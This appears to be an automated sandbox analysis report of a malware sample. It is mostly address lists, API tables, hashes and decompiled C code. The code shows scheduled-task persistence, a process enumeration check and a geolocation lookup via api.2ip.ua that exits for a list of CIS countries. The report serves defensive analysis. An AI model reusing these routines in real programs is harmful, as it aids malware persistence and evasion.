                                                                                                    0x0040d679
                                                                                                    0x0040d67d
                                                                                                    0x0040d67f
                                                                                                    0x0040d681
                                                                                                    0x0040d687
                                                                                                    0x0040d687
                                                                                                    0x0040d683
                                                                                                    0x0040d683
                                                                                                    0x0040d683
                                                                                                    0x0040d689
                                                                                                    0x0040d690
                                                                                                    0x0040d696
                                                                                                    0x0040d69c
                                                                                                    0x0040d6a1
                                                                                                    0x0040d6a3
                                                                                                    0x00000000
                                                                                                    0x0040d6a9
                                                                                                    0x0040d6b1
                                                                                                    0x0040d6b6
                                                                                                    0x0040d6ba
                                                                                                    0x0040d6bc
                                                                                                    0x0040d6be
                                                                                                    0x0040d6c4
                                                                                                    0x0040d6c4
                                                                                                    0x0040d6c0
                                                                                                    0x0040d6c0
                                                                                                    0x0040d6c0
                                                                                                    0x0040d6c6
                                                                                                    0x0040d6cd
                                                                                                    0x0040d6d3
                                                                                                    0x0040d6d9
                                                                                                    0x0040d6de
                                                                                                    0x0040d6e0
                                                                                                    0x00000000
                                                                                                    0x0040d6e6
                                                                                                    0x0040d6e6
                                                                                                    0x0040d6f2
                                                                                                    0x0040d6f4
                                                                                                    0x00000000
                                                                                                    0x0040d6fa
                                                                                                    0x0040d702
                                                                                                    0x0040d707
                                                                                                    0x0040d70b
                                                                                                    0x0040d70d
                                                                                                    0x0040d70f
                                                                                                    0x0040d715
                                                                                                    0x0040d715
                                                                                                    0x0040d711
                                                                                                    0x0040d711
                                                                                                    0x0040d711
                                                                                                    0x0040d717
                                                                                                    0x0040d71e
                                                                                                    0x0040d724
                                                                                                    0x0040d72a
                                                                                                    0x0040d72f
                                                                                                    0x0040d731
                                                                                                    0x00000000
                                                                                                    0x0040d737
                                                                                                    0x0040d73f
                                                                                                    0x0040d744
                                                                                                    0x0040d748
                                                                                                    0x0040d74a
                                                                                                    0x0040d74c
                                                                                                    0x0040d752
                                                                                                    0x0040d752
                                                                                                    0x0040d74e
                                                                                                    0x0040d74e
                                                                                                    0x0040d74e
                                                                                                    0x0040d754
                                                                                                    0x0040d75b
                                                                                                    0x0040d761
                                                                                                    0x0040d767
                                                                                                    0x0040d76c
                                                                                                    0x0040d76e
                                                                                                    0x00000000
                                                                                                    0x0040d774
                                                                                                    0x0040d778
                                                                                                    0x0040d77f
                                                                                                    0x0040d780
                                                                                                    0x0040d787
                                                                                                    0x0040d78a
                                                                                                    0x0040d79e
                                                                                                    0x0040d7a9
                                                                                                    0x0040d7b0
                                                                                                    0x0040d7be
                                                                                                    0x0040d7c3
                                                                                                    0x0040d7c6
                                                                                                    0x0040d7ca
                                                                                                    0x0040d7ce
                                                                                                    0x0040d7d0
                                                                                                    0x0040d7d0
                                                                                                    0x0040d7d6
                                                                                                    0x0040d7db
                                                                                                    0x0040d7df
                                                                                                    0x0040d7e1
                                                                                                    0x0040d7e3
                                                                                                    0x0040d7e9
                                                                                                    0x0040d7e9
                                                                                                    0x0040d7e5
                                                                                                    0x0040d7e5
                                                                                                    0x0040d7e5
                                                                                                    0x0040d7eb
                                                                                                    0x0040d7f2
                                                                                                    0x0040d7fa
                                                                                                    0x0040d805
                                                                                                    0x0040d809
                                                                                                    0x0040d80e
                                                                                                    0x0040d814
                                                                                                    0x0040d817
                                                                                                    0x0040d819
                                                                                                    0x00000000
                                                                                                    0x0040d81f
                                                                                                    0x0040d81f
                                                                                                    0x0040d825
                                                                                                    0x0040d830
                                                                                                    0x0040d833
                                                                                                    0x0040d835
                                                                                                    0x00000000
                                                                                                    0x0040d83b
                                                                                                    0x0040d83b
                                                                                                    0x0040d842
                                                                                                    0x0040d84e
                                                                                                    0x0040d851
                                                                                                    0x0040d859
                                                                                                    0x0040d85c
                                                                                                    0x0040d85e
                                                                                                    0x00000000
                                                                                                    0x0040d864
                                                                                                    0x0040d864
                                                                                                    0x0040d86b
                                                                                                    0x0040d87a
                                                                                                    0x0040d87c
                                                                                                    0x0040d884
                                                                                                    0x0040d887
                                                                                                    0x0040d889
                                                                                                    0x00000000
                                                                                                    0x0040d88f
                                                                                                    0x0040d88f
                                                                                                    0x0040d899
                                                                                                    0x0040d89e
                                                                                                    0x0040d8a3
                                                                                                    0x0040d8a7
                                                                                                    0x0040d8a9
                                                                                                    0x0040d8ab
                                                                                                    0x0040d8b1
                                                                                                    0x0040d8b1
                                                                                                    0x0040d8ad
                                                                                                    0x0040d8ad
                                                                                                    0x0040d8ad
                                                                                                    0x0040d8b3
                                                                                                    0x0040d8ba
                                                                                                    0x0040d8c0
                                                                                                    0x0040d8c6
                                                                                                    0x0040d8cb
                                                                                                    0x0040d8cd
                                                                                                    0x0040d8e5
                                                                                                    0x0040d8ea
                                                                                                    0x0040d8ee
                                                                                                    0x0040d8f0
                                                                                                    0x0040d8f2
                                                                                                    0x0040d8f8
                                                                                                    0x0040d8f8
                                                                                                    0x0040d8f4
                                                                                                    0x0040d8f4
                                                                                                    0x0040d8f4
                                                                                                    0x0040d8fa
                                                                                                    0x0040d901
                                                                                                    0x0040d907
                                                                                                    0x0040d90b
                                                                                                    0x0040d90d
                                                                                                    0x0040d912
                                                                                                    0x0040d918
                                                                                                    0x0040d91b
                                                                                                    0x0040d91d
                                                                                                    0x00000000
                                                                                                    0x0040d923
                                                                                                    0x0040d92a
                                                                                                    0x0040d931
                                                                                                    0x0040d936
                                                                                                    0x0040d941
                                                                                                    0x0040d949
                                                                                                    0x0040d94b
                                                                                                    0x0040d95a
                                                                                                    0x0040d962
                                                                                                    0x0040d964
                                                                                                    0x0040d96b
                                                                                                    0x0040d978
                                                                                                    0x0040d980
                                                                                                    0x0040d985
                                                                                                    0x0040d989
                                                                                                    0x0040d98b
                                                                                                    0x0040d98d
                                                                                                    0x0040d993
                                                                                                    0x0040d993
                                                                                                    0x0040d98f
                                                                                                    0x0040d98f
                                                                                                    0x0040d98f
                                                                                                    0x0040d995
                                                                                                    0x0040d99d
                                                                                                    0x0040d9b0
                                                                                                    0x0040d9b6
                                                                                                    0x0040d9b9
                                                                                                    0x0040d9c1
                                                                                                    0x0040d9c7
                                                                                                    0x0040d9d4
                                                                                                    0x0040d9e0
                                                                                                    0x0040d9e2
                                                                                                    0x0040d9e7
                                                                                                    0x0040d9f4
                                                                                                    0x0040d9fd
                                                                                                    0x0040da05
                                                                                                    0x0040da0a
                                                                                                    0x0040da0c
                                                                                                    0x0040da0e
                                                                                                    0x0040da46
                                                                                                    0x0040da4c
                                                                                                    0x0040da4f
                                                                                                    0x0040da55
                                                                                                    0x0040da58
                                                                                                    0x0040da5e
                                                                                                    0x0040da61
                                                                                                    0x0040da67
                                                                                                    0x0040da10
                                                                                                    0x0040da22
                                                                                                    0x0040da27
                                                                                                    0x00000000
                                                                                                    0x0040da27
                                                                                                    0x0040da0e
                                                                                                    0x0040d8cf
                                                                                                    0x0040d8cf
                                                                                                    0x0040d8d5
                                                                                                    0x00000000
                                                                                                    0x0040d8d5
                                                                                                    0x0040d8cd
                                                                                                    0x0040d889
                                                                                                    0x0040d85e
                                                                                                    0x0040d835
                                                                                                    0x0040d819
                                                                                                    0x0040d76e
                                                                                                    0x0040d731
                                                                                                    0x0040d6f4
                                                                                                    0x0040d6e0
                                                                                                    0x0040d6a3
                                                                                                    0x0040d666
                                                                                                    0x0040d651
                                                                                                    0x0040d626
                                                                                                    0x0040d5fd
                                                                                                    0x0040d5e1
                                                                                                    0x0040d59b
                                                                                                    0x0040d57c
                                                                                                    0x0040d55e
                                                                                                    0x0040d542
                                                                                                    0x0040d524
                                                                                                    0x0040d508
                                                                                                    0x0040d496
                                                                                                    0x0040d496
                                                                                                    0x0040d49c
                                                                                                    0x0040d49f
                                                                                                    0x0040d4a5
                                                                                                    0x0040d4a5
                                                                                                    0x0040d426
                                                                                                    0x0040d426
                                                                                                    0x0040d42c
                                                                                                    0x0040d42f
                                                                                                    0x0040d435
                                                                                                    0x0040d435
                                                                                                    0x0040d3cc
                                                                                                    0x0040d3cc
                                                                                                    0x0040d3d2
                                                                                                    0x0040d3d5
                                                                                                    0x0040d3db
                                                                                                    0x0040d3db
                                                                                                    0x0040d3ca
                                                                                                    0x0040da69
                                                                                                    0x0040da6d
                                                                                                    0x0040da72
                                                                                                    0x0040da77
                                                                                                    0x0040da77
                                                                                                    0x0040da7a
                                                                                                    0x0040da7c
                                                                                                    0x0040da83
                                                                                                    0x0040da8a
                                                                                                    0x0040d276
                                                                                                    0x0040d276
                                                                                                    0x0040d276
                                                                                                    0x0040da92
                                                                                                    0x0040da97
                                                                                                    0x0040da9c
                                                                                                    0x0040daa6
                                                                                                    0x0040dab1

                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                    • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                    • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                    • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                    • API String ID: 2496729271-1738591096
                                                                                                    • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                    • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                    • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                    • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 66%
                                                                                                    			E00412220() {
                                                                                                    				char _v8;
                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                    				unsigned int _v20;
                                                                                                    				unsigned int _v24;
                                                                                                    				WCHAR* _v28;
                                                                                                    				int _v32;
                                                                                                    				char _v36;
                                                                                                    				char _v2084;
                                                                                                    				char _v43044;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				intOrPtr* _t37;
                                                                                                    				void* _t38;
                                                                                                    				unsigned int _t40;
                                                                                                    				void* _t50;
                                                                                                    				struct HINSTANCE__* _t52;
                                                                                                    				int _t56;
                                                                                                    				signed int _t61;
                                                                                                    				struct HINSTANCE__* _t62;
                                                                                                    				void* _t63;
                                                                                                    				struct HINSTANCE__* _t64;
                                                                                                    				void* _t65;
                                                                                                    				void* _t66;
                                                                                                    
                                                                                                    				E0042F7C0(0xa820);
                                                                                                    				_t56 = 0;
                                                                                                    				_v32 = 0;
                                                                                                    				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
                                                                                                    				_t62 = LoadLibraryW(L"kernel32.dll");
                                                                                                    				_v8 = GetProcAddress(_t62, "EnumProcesses");
                                                                                                    				_v12 = GetProcAddress(_t62, "EnumProcessModules");
                                                                                                    				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
                                                                                                    				_t37 = _v8;
                                                                                                    				if(_t37 == 0) {
                                                                                                    					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
                                                                                                    					_t64 = _t52;
                                                                                                    					_v8 = GetProcAddress(_t64, "EnumProcesses");
                                                                                                    					_v12 = GetProcAddress(_t64, "EnumProcessModules");
                                                                                                    					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
                                                                                                    					_t37 = _v8;
                                                                                                    				}
                                                                                                    				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
                                                                                                    				if(_t38 != 0) {
                                                                                                    					_t61 = 0;
                                                                                                    					_t40 = _v20 >> 2;
                                                                                                    					_v24 = _t40;
                                                                                                    					if(_t40 != 0) {
                                                                                                    						do {
                                                                                                    							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
                                                                                                    							if(_t63 != 0) {
                                                                                                    								_push( &_v36);
                                                                                                    								_push(4);
                                                                                                    								_push( &_v8);
                                                                                                    								_push(_t63); // executed
                                                                                                    								if(_v12() != 0) {
                                                                                                    									_v16(_t63, _v8,  &_v2084, 0x400);
                                                                                                    									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
                                                                                                    									_t66 = _t66 + 8;
                                                                                                    									if(_t50 == 0) {
                                                                                                    										_t56 = _t56 + 1;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							}
                                                                                                    							CloseHandle(_t63);
                                                                                                    							_t61 = _t61 + 1;
                                                                                                    						} while (_t61 < _v24);
                                                                                                    					}
                                                                                                    					return _t56;
                                                                                                    				} else {
                                                                                                    					return 1;
                                                                                                    				}
                                                                                                    			}




























                                                                                                    0x00412228
                                                                                                    0x0041222f
                                                                                                    0x00412232
                                                                                                    0x00412253
                                                                                                    0x00412262
                                                                                                    0x00412272
                                                                                                    0x0041227d
                                                                                                    0x00412282
                                                                                                    0x00412285
                                                                                                    0x0041228a
                                                                                                    0x00412291
                                                                                                    0x00412297
                                                                                                    0x004122a7
                                                                                                    0x004122b2
                                                                                                    0x004122b7
                                                                                                    0x004122ba
                                                                                                    0x004122ba
                                                                                                    0x004122cd
                                                                                                    0x004122d1
                                                                                                    0x004122e2
                                                                                                    0x004122e4
                                                                                                    0x004122e7
                                                                                                    0x004122ec
                                                                                                    0x004122f0
                                                                                                    0x00412304
                                                                                                    0x00412308
                                                                                                    0x0041230d
                                                                                                    0x0041230e
                                                                                                    0x00412313
                                                                                                    0x00412314
                                                                                                    0x0041231a
                                                                                                    0x0041232c
                                                                                                    0x00412339
                                                                                                    0x0041233e
                                                                                                    0x00412343
                                                                                                    0x00412345
                                                                                                    0x00412345
                                                                                                    0x00412343
                                                                                                    0x0041231a
                                                                                                    0x00412347
                                                                                                    0x0041234d
                                                                                                    0x0041234e
                                                                                                    0x004122f0
                                                                                                    0x0041235b
                                                                                                    0x004122d5
                                                                                                    0x004122de
                                                                                                    0x004122de

                                                                                                    APIs
                                                                                                    • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                    • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                    • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                    • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                    • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                    • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                    • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                    • API String ID: 3668891214-3807497772
                                                                                                    • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                    • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                    • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                    • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 988 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 995 40cfb2-40cfb4 988->995 996 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 988->996 997 40d213-40d217 995->997 999 40d000-40d01d 996->999 1000 40d224-40d236 997->1000 1001 40d219-40d221 call 422587 997->1001 1002 40d023-40d02c 999->1002 1003 40d01f-40d021 999->1003 1001->1000 1006 40d030-40d035 1002->1006 1005 40d039-40d069 call 4156d0 call 414300 1003->1005 1013 40d1cb 1005->1013 1014 40d06f-40d08b call 413010 1005->1014 1006->1006 1008 40d037 1006->1008 1008->1005 1015 40d1cd-40d1d1 1013->1015 1020 40d0b9-40d0bd 1014->1020 1021 40d08d-40d091 1014->1021 1017 40d1d3-40d1db call 422587 1015->1017 1018 40d1de-40d1f4 1015->1018 1017->1018 1023 40d201-40d20f 1018->1023 1024 40d1f6-40d1fe call 422587 1018->1024 1028 40d0cd-40d0e1 call 414300 1020->1028 1029 40d0bf-40d0ca call 422587 1020->1029 1025 40d093-40d09b call 422587 1021->1025 1026 40d09e-40d0b4 call 413d40 1021->1026 1023->997 1024->1023 1025->1026 1026->1020 1028->1013 1039 40d0e7-40d149 call 413010 1028->1039 1029->1028 1042 40d150-40d15a 1039->1042 1043 40d160-40d162 1042->1043 1044 40d15c-40d15e 1042->1044 1046 40d165-40d16a 1043->1046 1045 40d16e-40d18b call 40b650 1044->1045 1050 40d19a-40d19e 1045->1050 1051 40d18d-40d18f 1045->1051 1046->1046 1047 40d16c 1046->1047 1047->1045 1050->1042 1053 40d1a0 1050->1053 1051->1050 1052 40d191-40d198 1051->1052 1052->1050 1054 40d1c7-40d1c9 1052->1054 1055 40d1a2-40d1a6 1053->1055 1054->1055 1056 40d1b3-40d1c5 1055->1056 1057 40d1a8-40d1b0 call 422587 1055->1057 1056->1015 1057->1056
                                                                                                    C-Code - Quality: 86%
                                                                                                    			E0040CF10() {
                                                                                                    				WCHAR* _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				intOrPtr _v20;
                                                                                                    				WCHAR* _v24;
                                                                                                    				char _v40;
                                                                                                    				intOrPtr _v44;
                                                                                                    				WCHAR* _v48;
                                                                                                    				char _v64;
                                                                                                    				intOrPtr _v68;
                                                                                                    				WCHAR* _v72;
                                                                                                    				char _v88;
                                                                                                    				intOrPtr _v92;
                                                                                                    				WCHAR* _v96;
                                                                                                    				char _v112;
                                                                                                    				intOrPtr _v116;
                                                                                                    				intOrPtr _v120;
                                                                                                    				intOrPtr _v124;
                                                                                                    				intOrPtr _v128;
                                                                                                    				intOrPtr _v132;
                                                                                                    				char _v136;
                                                                                                    				intOrPtr _v140;
                                                                                                    				intOrPtr _v144;
                                                                                                    				intOrPtr _v148;
                                                                                                    				intOrPtr _v152;
                                                                                                    				long _v156;
                                                                                                    				char _v10395;
                                                                                                    				void _v10396;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				void* _t90;
                                                                                                    				void* _t95;
                                                                                                    				intOrPtr _t102;
                                                                                                    				intOrPtr _t119;
                                                                                                    				signed int _t122;
                                                                                                    				void* _t128;
                                                                                                    				WCHAR* _t129;
                                                                                                    				WCHAR* _t131;
                                                                                                    				intOrPtr* _t134;
                                                                                                    				void* _t135;
                                                                                                    				void* _t142;
                                                                                                    				void* _t146;
                                                                                                    				intOrPtr* _t147;
                                                                                                    				void* _t149;
                                                                                                    				signed int _t151;
                                                                                                    				void* _t152;
                                                                                                    				void* _t153;
                                                                                                    				intOrPtr* _t157;
                                                                                                    				void* _t158;
                                                                                                    				void* _t159;
                                                                                                    				intOrPtr _t160;
                                                                                                    				void* _t161;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4ca850);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t160;
                                                                                                    				E0042F7C0(0x2890);
                                                                                                    				_push(_t128);
                                                                                                    				_push(_t152);
                                                                                                    				_v10396 = 0;
                                                                                                    				E0042B420( &_v10395, 0, 0x27ff);
                                                                                                    				_t161 = _t160 + 0xc;
                                                                                                    				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
                                                                                                    				_t149 = _t90;
                                                                                                    				_v92 = 7;
                                                                                                    				_push(0x1b);
                                                                                                    				_v96 = 0;
                                                                                                    				_v112 = 0;
                                                                                                    				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
                                                                                                    				_v8 = 0;
                                                                                                    				_t94 =  >=  ? _v112 :  &_v112;
                                                                                                    				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
                                                                                                    				_t153 = _t95;
                                                                                                    				if(_t153 != 0) {
                                                                                                    					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
                                                                                                    					InternetCloseHandle(_t153);
                                                                                                    					InternetCloseHandle(_t149);
                                                                                                    					_push(0x10);
                                                                                                    					_v44 = 0xf;
                                                                                                    					_v48 = 0;
                                                                                                    					_v64 = 0;
                                                                                                    					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
                                                                                                    					_v8 = 1;
                                                                                                    					_v20 = 0xf;
                                                                                                    					_v24 = 0;
                                                                                                    					_v40 = 0;
                                                                                                    					if(_v10396 != 0) {
                                                                                                    						_t134 =  &_v10396;
                                                                                                    						_t23 = _t134 + 1; // 0x1
                                                                                                    						_t146 = _t23;
                                                                                                    						do {
                                                                                                    							_t102 =  *_t134;
                                                                                                    							_t134 = _t134 + 1;
                                                                                                    						} while (_t102 != 0);
                                                                                                    						_t135 = _t134 - _t146;
                                                                                                    					} else {
                                                                                                    						_t135 = 0;
                                                                                                    					}
                                                                                                    					_push(_t135);
                                                                                                    					E004156D0(_t128,  &_v40, _t149,  &_v10396);
                                                                                                    					_v8 = 2;
                                                                                                    					_t106 =  >=  ? _v64 :  &_v64;
                                                                                                    					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
                                                                                                    						L30:
                                                                                                    						_t129 = 0;
                                                                                                    					} else {
                                                                                                    						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
                                                                                                    						if( &_v40 != _t114) {
                                                                                                    							if(_v20 >= 0x10) {
                                                                                                    								L00422587(_v40);
                                                                                                    								_t161 = _t161 + 4;
                                                                                                    							}
                                                                                                    							_v20 = 0xf;
                                                                                                    							_v24 = 0;
                                                                                                    							_v40 = 0;
                                                                                                    							E00413D40( &_v40, _t156);
                                                                                                    						}
                                                                                                    						if(_v116 >= 0x10) {
                                                                                                    							L00422587(_v136);
                                                                                                    							_t161 = _t161 + 4;
                                                                                                    						}
                                                                                                    						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
                                                                                                    							goto L30;
                                                                                                    						} else {
                                                                                                    							E00413010( &_v40,  &_v88, 0, _t116);
                                                                                                    							_t131 = _v72;
                                                                                                    							_t151 = 0;
                                                                                                    							_v152 = "RU";
                                                                                                    							_v148 = "BY";
                                                                                                    							_v144 = "UA";
                                                                                                    							_v140 = "AZ";
                                                                                                    							_v136 = "AM";
                                                                                                    							_v132 = "TJ";
                                                                                                    							_v128 = "KZ";
                                                                                                    							_v124 = "KG";
                                                                                                    							_v120 = "UZ";
                                                                                                    							_v116 = "SY";
                                                                                                    							do {
                                                                                                    								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
                                                                                                    								if( *_t147 != 0) {
                                                                                                    									_t157 = _t147;
                                                                                                    									_t61 = _t157 + 1; // 0x500005
                                                                                                    									_t142 = _t61;
                                                                                                    									do {
                                                                                                    										_t119 =  *_t157;
                                                                                                    										_t157 = _t157 + 1;
                                                                                                    									} while (_t119 != 0);
                                                                                                    									_t158 = _t157 - _t142;
                                                                                                    								} else {
                                                                                                    									_t158 = 0;
                                                                                                    								}
                                                                                                    								_t144 =  >=  ? _v88 :  &_v88;
                                                                                                    								_t121 =  <  ? _t131 : _t158;
                                                                                                    								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
                                                                                                    								_t161 = _t161 + 4;
                                                                                                    								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
                                                                                                    									goto L24;
                                                                                                    								} else {
                                                                                                    									_t129 = 1;
                                                                                                    								}
                                                                                                    								L26:
                                                                                                    								if(_v68 >= 0x10) {
                                                                                                    									L00422587(_v88);
                                                                                                    									_t161 = _t161 + 4;
                                                                                                    								}
                                                                                                    								_v68 = 0xf;
                                                                                                    								_v72 = 0;
                                                                                                    								_v88 = 0;
                                                                                                    								goto L31;
                                                                                                    								L24:
                                                                                                    								_t151 = _t151 + 1;
                                                                                                    							} while (_t151 < 9);
                                                                                                    							_t129 = 0;
                                                                                                    							goto L26;
                                                                                                    						}
                                                                                                    					}
                                                                                                    					L31:
                                                                                                    					if(_v20 >= 0x10) {
                                                                                                    						L00422587(_v40);
                                                                                                    						_t161 = _t161 + 4;
                                                                                                    					}
                                                                                                    					_v20 = 0xf;
                                                                                                    					_v24 = 0;
                                                                                                    					_v40 = 0;
                                                                                                    					if(_v44 >= 0x10) {
                                                                                                    						L00422587(_v64);
                                                                                                    						_t161 = _t161 + 4;
                                                                                                    					}
                                                                                                    					_v44 = 0xf;
                                                                                                    					_v48 = 0;
                                                                                                    					_v64 = 0;
                                                                                                    				} else {
                                                                                                    					_t129 = 0;
                                                                                                    				}
                                                                                                    				if(_v92 >= 8) {
                                                                                                    					L00422587(_v112);
                                                                                                    				}
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return _t129;
                                                                                                    			}
























































                                                                                                    0x0040cf19
                                                                                                    0x0040cf1b
                                                                                                    0x0040cf20
                                                                                                    0x0040cf26
                                                                                                    0x0040cf2d
                                                                                                    0x0040cf32
                                                                                                    0x0040cf33
                                                                                                    0x0040cf40
                                                                                                    0x0040cf4a
                                                                                                    0x0040cf4f
                                                                                                    0x0040cf5f
                                                                                                    0x0040cf65
                                                                                                    0x0040cf67
                                                                                                    0x0040cf6e
                                                                                                    0x0040cf72
                                                                                                    0x0040cf81
                                                                                                    0x0040cf85
                                                                                                    0x0040cf8e
                                                                                                    0x0040cf9e
                                                                                                    0x0040cfa6
                                                                                                    0x0040cfac
                                                                                                    0x0040cfb0
                                                                                                    0x0040cfcd
                                                                                                    0x0040cfda
                                                                                                    0x0040cfdd
                                                                                                    0x0040cfdf
                                                                                                    0x0040cfe9
                                                                                                    0x0040cff0
                                                                                                    0x0040cff7
                                                                                                    0x0040cffb
                                                                                                    0x0040d000
                                                                                                    0x0040d00b
                                                                                                    0x0040d012
                                                                                                    0x0040d019
                                                                                                    0x0040d01d
                                                                                                    0x0040d023
                                                                                                    0x0040d029
                                                                                                    0x0040d029
                                                                                                    0x0040d030
                                                                                                    0x0040d030
                                                                                                    0x0040d032
                                                                                                    0x0040d033
                                                                                                    0x0040d037
                                                                                                    0x0040d01f
                                                                                                    0x0040d01f
                                                                                                    0x0040d01f
                                                                                                    0x0040d039
                                                                                                    0x0040d044
                                                                                                    0x0040d049
                                                                                                    0x0040d05c
                                                                                                    0x0040d069
                                                                                                    0x0040d1cb
                                                                                                    0x0040d1cb
                                                                                                    0x0040d06f
